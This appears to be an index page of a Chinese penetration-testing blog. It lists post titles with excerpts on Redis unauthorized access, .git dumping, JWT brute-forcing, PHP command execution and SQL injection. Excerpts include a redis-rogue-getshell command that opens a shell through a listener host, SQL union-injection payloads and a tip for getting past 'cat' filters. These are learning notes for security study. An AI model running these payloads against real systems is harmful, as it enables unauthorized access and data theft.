服务攻防
redis # 未授权访问-CNVD-2019-21763
https://github.com/vulhub/redis-rogue-getshell
./redis-master.py -r 目标IP -p 目标端口 -L 172.31.0.66 -P 8888 -f RedisModulesS
Kali
常用工具 dumpall https://github.com/0xHJK/dumpall 能直接浏览到.git可以wget -r xxxx.com 放目标地址就可以递归下载了,dumpall似乎下载下来是最终的文件丢失了.git 看不到历史 # 1. 创建虚拟环境
python3 -m venv
java 安全渗透专题
https://github.com/bewhale/JavaSec https://github.com/whgojp/JavaSecLab sql 注入 SQL注入的根本原因 SQL注入的根本原因是代码中通过字符串拼接的方式生成SQL语句,也可以说是用户输入被当作SQL代码解释执行,导致数据与代
portswigger 靶场
1. JWT身份验证 爆破弱secret HS256 对称加密他会使用同一个秘钥来加解密,RS256 非对称加密他会使用公私钥加密或者解密 使用jwt_tool这个python项目来尝试爆破 https://github.com/ticarpi/jwt_tool,使用jwt_tool-2.2.7搭配
关于加解密的方式与思考
写在最前 一个可靠的前端之所以要做大量防护,本质上并不是追求“绝对无法破解”,而是尽可能提高攻击者的逆向与调试成本。 最基础的就是 JS 混淆,将原本可读的代码转换成难以阅读的形式。当攻击者试图通过 Chrome F12 查看逻辑时,首先面对的就是大量混淆后的代码,这本身就已经提高了分析门槛。 在此
快速入门 PHP
x. 函数 cat与tac都是linux的命令,但是很多时候会过滤cat但是配置者不知道还有tac这个命令,遂推荐用tac # 获取当前目录
echo getcwd();
# 命令执行如果不直接输出即使命令里面带有cat也是不行的,他只是收集到了结果,不是输出内容,例如 echo shell_ex
常见渗透测试方式
1. SQL注入 # 联合查询注入
' union select 1,2,3 -- -
# 获取库
' union select database(),2,3 -- -
# 获取表名
' union select 1,2,group_concat(table_name) from informat
开发与加速测试
1. nvm 任意快速切换nodejs curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.39.7/install.sh | bash 2. github # 启用代理
git config --global http.proxy ht
coder远程开发
写在最前 https://coder.com/ 在大规模项目的部署与开发过程中,传统基于 Docker 的单机容器管理方式已难以满足需求。随着服务规模扩大至数十甚至上百个容器,容器的生命周期、网络、资源及依赖关系的管理成本急剧上升,整体复杂度显著增加。 为解决这一问题,通常需要引入 Kubernet
